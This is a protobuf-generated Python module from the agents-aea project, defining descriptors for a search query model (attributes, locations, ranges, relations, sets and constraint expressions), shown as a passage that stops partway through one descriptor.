] | 1,814 | 2019-08-24T10:08:07.000Z | 2022-03-31T14:28:36.000Z | aea/helpers/search/models_pb2.py | salman6049/agents-aea | d3f177a963eb855d9528555167255bf2b478f4ba | [
"Apache-2.0"
] | 46 | 2019-09-03T22:13:58.000Z | 2022-03-22T01:25:16.000Z | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: models.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name="models.proto",
package="aea.helpers.search.models",
syntax="proto3",
serialized_options=b"H\001",
serialized_pb=b'\n\x0cmodels.proto\x12\x19\x61\x65\x61.helpers.search.models"\xc1\x19\n\x05Query\x1a\xc0\x01\n\tAttribute\x12\x0c\n\x04name\x18\x01 \x01(\t\x12=\n\x04type\x18\x02 \x01(\x0e\x32/.aea.helpers.search.models.Query.Attribute.Type\x12\x10\n\x08required\x18\x03 \x01(\x08\x12\x13\n\x0b\x64\x65scription\x18\x04 \x01(\t"?\n\x04Type\x12\n\n\x06\x44OUBLE\x10\x00\x12\x07\n\x03INT\x10\x01\x12\x08\n\x04\x42OOL\x10\x02\x12\n\n\x06STRING\x10\x03\x12\x0c\n\x08LOCATION\x10\x04\x1an\n\tDataModel\x12\x0c\n\x04name\x18\x01 \x01(\t\x12>\n\nattributes\x18\x02 \x03(\x0b\x32*.aea.helpers.search.models.Query.Attribute\x12\x13\n\x0b\x64\x65scription\x18\x03 \x01(\t\x1a$\n\x08Location\x12\x0b\n\x03lon\x18\x01 \x01(\x01\x12\x0b\n\x03lat\x18\x02 \x01(\x01\x1a\x99\x01\n\x05Value\x12\x10\n\x06string\x18\x01 \x01(\tH\x00\x12\x10\n\x06\x64ouble\x18\x02 \x01(\x01H\x00\x12\x11\n\x07\x62oolean\x18\x03 \x01(\x08H\x00\x12\x11\n\x07integer\x18\x04 \x01(\x03H\x00\x12=\n\x08location\x18\x05 \x01(\x0b\x32).aea.helpers.search.models.Query.LocationH\x00\x42\x07\n\x05value\x1aN\n\x08KeyValue\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\x35\n\x05value\x18\x02 \x01(\x0b\x32&.aea.helpers.search.models.Query.Value\x1a\x80\x01\n\x08Instance\x12\x39\n\x05model\x18\x01 \x01(\x0b\x32*.aea.helpers.search.models.Query.DataModel\x12\x39\n\x06values\x18\x02 \x03(\x0b\x32).aea.helpers.search.models.Query.KeyValue\x1a+\n\nStringPair\x12\r\n\x05\x66irst\x18\x01 \x01(\t\x12\x0e\n\x06second\x18\x02 \x01(\t\x1a(\n\x07IntPair\x12\r\n\x05\x66irst\x18\x01 \x01(\x03\x12\x0e\n\x06second\x18\x02 \x01(\x03\x1a+\n\nDoublePair\x12\r\n\x05\x66irst\x18\x01 \x01(\x01\x12\x0e\n\x06second\x18\x02 \x01(\x01\x1a\x83\x01\n\x0cLocationPair\x12\x38\n\x05\x66irst\x18\x01 \x01(\x0b\x32).aea.helpers.search.models.Query.Location\x12\x39\n\x06second\x18\x02 \x01(\x0b\x32).aea.helpers.search.models.Query.Location\x1a\xa1\x02\n\x05Range\x12\x42\n\x0bstring_pair\x18\x01 \x01(\x0b\x32+.aea.helpers.search.models.Query.StringPairH\x00\x12@\n\x0cinteger_pair\x18\x02 \x01(\x0b\x32(.aea.helpers.search.models.Query.IntPairH\x00\x12\x42\n\x0b\x64ouble_pair\x18\x03 \x01(\x0b\x32+.aea.helpers.search.models.Query.DoublePairH\x00\x12\x46\n\rlocation_pair\x18\x04 \x01(\x0b\x32-.aea.helpers.search.models.Query.LocationPairH\x00\x42\x06\n\x04pair\x1aW\n\x08\x44istance\x12\x39\n\x06\x63\x65nter\x18\x01 \x01(\x0b\x32).aea.helpers.search.models.Query.Location\x12\x10\n\x08\x64istance\x18\x02 \x01(\x01\x1a\xca\x01\n\x08Relation\x12\x44\n\x08operator\x18\x01 \x01(\x0e\x32\x32.aea.helpers.search.models.Query.Relation.Operator\x12\x35\n\x05value\x18\x02 \x01(\x0b\x32&.aea.helpers.search.models.Query.Value"A\n\x08Operator\x12\x06\n\x02\x45Q\x10\x00\x12\x06\n\x02LT\x10\x01\x12\x08\n\x04LTEQ\x10\x02\x12\x06\n\x02GT\x10\x03\x12\x08\n\x04GTEQ\x10\x04\x12\t\n\x05NOTEQ\x10\x05\x1a\xca\x05\n\x03Set\x12?\n\x08operator\x18\x01 \x01(\x0e\x32-.aea.helpers.search.models.Query.Set.Operator\x12;\n\x06values\x18\x02 \x01(\x0b\x32+.aea.helpers.search.models.Query.Set.Values\x1a\xa5\x04\n\x06Values\x12\x45\n\x06string\x18\x01 \x01(\x0b\x32\x33.aea.helpers.search.models.Query.Set.Values.StringsH\x00\x12\x45\n\x06\x64ouble\x18\x02 \x01(\x0b\x32\x33.aea.helpers.search.models.Query.Set.Values.DoublesH\x00\x12\x44\n\x07\x62oolean\x18\x03 \x01(\x0b\x32\x31.aea.helpers.search.models.Query.Set.Values.BoolsH\x00\x12\x43\n\x07integer\x18\x04 \x01(\x0b\x32\x30.aea.helpers.search.models.Query.Set.Values.IntsH\x00\x12I\n\x08location\x18\x05 \x01(\x0b\x32\x35.aea.helpers.search.models.Query.Set.Values.LocationsH\x00\x1a\x16\n\x04Ints\x12\x0e\n\x06values\x18\x01 \x03(\x03\x1a\x19\n\x07\x44oubles\x12\x0e\n\x06values\x18\x01 \x03(\x01\x1a\x19\n\x07Strings\x12\x0e\n\x06values\x18\x01 \x03(\t\x1a\x17\n\x05\x42ools\x12\x0e\n\x06values\x18\x01 \x03(\x08\x1a\x46\n\tLocations\x12\x39\n\x06values\x18\x01 \x03(\x0b\x32).aea.helpers.search.models.Query.LocationB\x08\n\x06values"\x1d\n\x08Operator\x12\x06\n\x02IN\x10\x00\x12\t\n\x05NOTIN\x10\x01\x1a\xc3\x06\n\x0e\x43onstraintExpr\x12\x41\n\x03or_\x18\x01 \x01(\x0b\x32\x32.aea.helpers.search.models.Query.ConstraintExpr.OrH\x00\x12\x43\n\x04\x61nd_\x18\x02 \x01(\x0b\x32\x33.aea.helpers.search.models.Query.ConstraintExpr.AndH\x00\x12\x43\n\x04not_\x18\x03 \x01(\x0b\x32\x33.aea.helpers.search.models.Query.ConstraintExpr.NotH\x00\x12P\n\nconstraint\x18\x04 \x01(\x0b\x32:.aea.helpers.search.models.Query.ConstraintExpr.ConstraintH\x00\x1aI\n\x02Or\x12\x43\n\nexpression\x18\x01 \x03(\x0b\x32/.aea.helpers.search.models.Query.ConstraintExpr\x1aJ\n\x03\x41nd\x12\x43\n\nexpression\x18\x01 \x03(\x0b\x32/.aea.helpers.search.models.Query.ConstraintExpr\x1aJ\n\x03Not\x12\x43\n\nexpression\x18\x01 \x01(\x0b\x32/.aea.helpers.search.models.Query.ConstraintExpr\x1a\xa0\x02\n\nConstraint\x12\x16\n\x0e\x61ttribute_name\x18\x01 \x01(\t\x12\x34\n\x04set_\x18\x02 \x01(\x0b\x32$.aea.helpers.search.models.Query.SetH\x00\x12\x38\n\x06range_\x18\x03 \x01(\x0b\x32&.aea.helpers.search.models.Query.RangeH\x00\x12=\n\x08relation\x18\x04 \x01(\x0b\x32).aea.helpers.search.models.Query.RelationH\x00\x12=\n\x08\x64istance\x18\x05 \x01(\x0b\x32).aea.helpers.search.models.Query.DistanceH\x00\x42\x0c\n\nconstraintB\x0c\n\nexpression\x1a\x88\x01\n\x05Model\x12\x44\n\x0b\x63onstraints\x18\x01 \x03(\x0b\x32/.aea.helpers.search.models.Query.ConstraintExpr\x12\x39\n\x05model\x18\x02 \x01(\x0b\x32*.aea.helpers.search.models.Query.DataModelB\x02H\x01\x62\x06proto3',
)
_QUERY_ATTRIBUTE_TYPE = _descriptor.EnumDescriptor(
name="Type",
full_name="aea.helpers.search.models.Query.Attribute.Type",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="DOUBLE", index=0, number=0, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="INT", index=1, number=1, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="BOOL", index=2, number=2, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="STRING", index=3, number=3, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="LOCATION", index=4, number=4, serialized_options=None, type=None
),
],
containing_type=None,
serialized_options=None,
serialized_start=183,
serialized_end=246,
)
_sym_db.RegisterEnumDescriptor(_QUERY_ATTRIBUTE_TYPE)
_QUERY_RELATION_OPERATOR = _descriptor.EnumDescriptor(
name="Operator",
full_name="aea.helpers.search.models.Query.Relation.Operator",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="EQ", index=0, number=0, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="LT", index=1, number=1, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="LTEQ", index=2, number=2, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="GT", index=3, number=3, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="GTEQ", index=4, number=4, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="NOTEQ", index=5, number=5, serialized_options=None, type=None
),
],
containing_type=None,
serialized_options=None,
serialized_start=1550,
serialized_end=1615,
)
_sym_db.RegisterEnumDescriptor(_QUERY_RELATION_OPERATOR)
_QUERY_SET_OPERATOR = _descriptor.EnumDescriptor(
name="Operator",
full_name="aea.helpers.search.models.Query.Set.Operator",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="IN", index=0, number=0, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="NOTIN", index=1, number=1, serialized_options=None, type=None
),
],
containing_type=None,
serialized_options=None,
serialized_start=2303,
serialized_end=2332,
)
_sym_db.RegisterEnumDescriptor(_QUERY_SET_OPERATOR)
_QUERY_ATTRIBUTE = _descriptor.Descriptor(
name="Attribute",
full_name="aea.helpers.search.models.Query.Attribute",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="name",
full_name="aea.helpers.search.models.Query.Attribute.name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="type",
full_name="aea.helpers.search.models.Query.Attribute.type",
index=1,
number=2,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="required",
full_name="aea.helpers.search.models.Query.Attribute.required",
index=2,
number=3,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="description",
full_name="aea.helpers.search.models.Query.Attribute.description",
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[_QUERY_ATTRIBUTE_TYPE,],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=54,
serialized_end=246,
)
_QUERY_DATAMODEL = _descriptor.Descriptor(
name="DataModel",
full_name="aea.helpers.search.models.Query.DataModel",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="name",
full_name="aea.helpers.search.models.Query.DataModel.name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="attributes",
full_name="aea.helpers.search.models.Query.DataModel.attributes",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="description",
full_name="aea.helpers.search.models.Query.DataModel.description",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=248,
serialized_end=358,
)
_QUERY_LOCATION = _descriptor.Descriptor(
name="Location",
full_name="aea.helpers.search.models.Query.Location",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="lon",
full_name="aea.helpers.search.models.Query.Location.lon",
index=0,
number=1,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="lat",
full_name="aea.helpers.search.models.Query.Location.lat",
index=1,
number=2,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=360,
serialized_end=396,
)
_QUERY_VALUE = _descriptor.Descriptor(
name="Value",
full_name="aea.helpers.search.models.Query.Value",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="string",
full_name="aea.helpers.search.models.Query.Value.string",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="double",
full_name="aea.helpers.search.models.Query.Value.double",
index=1,
number=2,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="boolean",
full_name="aea.helpers.search.models.Query.Value.boolean",
index=2,
number=3,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="integer",
full_name="aea.helpers.search.models.Query.Value.integer",
index=3,
number=4,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="location",
full_name="aea.helpers.search.models.Query.Value.location",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="value",
full_name="aea.helpers.search.models.Query.Value.value",
index=0,
containing_type=None,
fields=[],
),
],
serialized_start=399,
serialized_end=552,
)
_QUERY_KEYVALUE = _descriptor.Descriptor(
name="KeyValue",
full_name="aea.helpers.search.models.Query.KeyValue",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="key",
full_name="aea.helpers.search.models.Query.KeyValue.key",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="value",
full_name="aea.helpers.search.models.Query.KeyValue.value",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=554,
serialized_end=632,
)
_QUERY_INSTANCE = _descriptor.Descriptor(
name="Instance",
full_name="aea.helpers.search.models.Query.Instance",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="model",
full_name="aea.helpers.search.models.Query.Instance.model",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="values",
full_name="aea.helpers.search.models.Query.Instance.values",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=635,
serialized_end=763,
)
_QUERY_STRINGPAIR = _descriptor.Descriptor(
name="StringPair",
full_name="aea.helpers.search.models.Query.StringPair",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="first",
full_name="aea.helpers.search.models.Query.StringPair.first",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="second",
full_name="aea.helpers.search.models.Query.StringPair.second",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=765,
serialized_end=808,
)
_QUERY_INTPAIR = _descriptor.Descriptor(
name="IntPair",
full_name="aea.helpers.search.models.Query.IntPair",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="first",
full_name="aea.helpers.search.models.Query.IntPair.first",
index=0,
number=1,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="second",
full_name="aea.helpers.search.models.Query.IntPair.second",
index=1,
number=2,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=810,
serialized_end=850,
)
_QUERY_DOUBLEPAIR = _descriptor.Descriptor(
name="DoublePair",
full_name="aea.helpers.search.models.Query.DoublePair",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="first",
full_name="aea.helpers.search.models.Query.DoublePair.first",
index=0,
number=1,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="second",
full_name="aea.helpers.search.models.Query.DoublePair.second",
index=1,
number=2,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=852,
serialized_end=895,
)
_QUERY_LOCATIONPAIR = _descriptor.Descriptor(
name="LocationPair",
full_name="aea.helpers.search.models.Query.LocationPair",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="first",
full_name="aea.helpers.search.models.Query.LocationPair.first",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="second",
full_name="aea.helpers.search.models.Query.LocationPair.second",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=898,
serialized_end=1029,
)
_QUERY_RANGE = _descriptor.Descriptor(
name="Range",
full_name="aea.helpers.search.models.Query.Range",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="string_pair",
full_name="aea.helpers.search.models.Query.Range.string_pair",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="integer_pair",
full_name="aea.helpers.search.models.Query.Range.integer_pair",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="double_pair",
full_name="aea.helpers.search.models.Query.Range.double_pair",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="location_pair",
full_name="aea.helpers.search.models.Query.Range.location_pair",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="pair",
full_name="aea.helpers.search.models.Query.Range.pair",
index=0,
containing_type=None,
fields=[],
),
],
serialized_start=1032,
serialized_end=1321,
)
_QUERY_DISTANCE = _descriptor.Descriptor(
name="Distance",
full_name="aea.helpers.search.models.Query.Distance",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="center",
full_name="aea.helpers.search.models.Query.Distance.center",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="distance",
full_name="aea.helpers.search.models.Query.Distance.distance",
index=1,
number=2,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1323,
serialized_end=1410,
)
_QUERY_RELATION = _descriptor.Descriptor(
name="Relation",
full_name="aea.helpers.search.models.Query.Relation",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="operator",
full_name="aea.helpers.search.models.Query.Relation.operator",
index=0,
number=1,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="value",
full_name="aea.helpers.search.models.Query.Relation.value",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[_QUERY_RELATION_OPERATOR,],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1413,
serialized_end=1615,
)
_QUERY_SET_VALUES_INTS = _descriptor.Descriptor(
name="Ints",
full_name="aea.helpers.search.models.Query.Set.Values.Ints",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="values",
full_name="aea.helpers.search.models.Query.Set.Values.Ints.values",
index=0,
number=1,
type=3,
cpp_type=2,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2118,
serialized_end=2140,
)
_QUERY_SET_VALUES_DOUBLES = _descriptor.Descriptor(
name="Doubles",
full_name="aea.helpers.search.models.Query.Set.Values.Doubles",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="values",
full_name="aea.helpers.search.models.Query.Set.Values.Doubles.values",
index=0,
number=1,
type=1,
cpp_type=5,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2142,
serialized_end=2167,
)
_QUERY_SET_VALUES_STRINGS = _descriptor.Descriptor(
name="Strings",
full_name="aea.helpers.search.models.Query.Set.Values.Strings",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="values",
full_name="aea.helpers.search.models.Query.Set.Values.Strings.values",
index=0,
number=1,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2169,
serialized_end=2194,
)
_QUERY_SET_VALUES_BOOLS = _descriptor.Descriptor(
name="Bools",
full_name="aea.helpers.search.models.Query.Set.Values.Bools",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="values",
full_name="aea.helpers.search.models.Query.Set.Values.Bools.values",
index=0,
number=1,
type=8,
cpp_type=7,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2196,
serialized_end=2219,
)
_QUERY_SET_VALUES_LOCATIONS = _descriptor.Descriptor(
name="Locations",
full_name="aea.helpers.search.models.Query.Set.Values.Locations",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="values",
full_name="aea.helpers.search.models.Query.Set.Values.Locations.values",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2221,
serialized_end=2291,
)
_QUERY_SET_VALUES = _descriptor.Descriptor(
name="Values",
full_name="aea.helpers.search.models.Query.Set.Values",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="string",
full_name="aea.helpers.search.models.Query.Set.Values.string",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
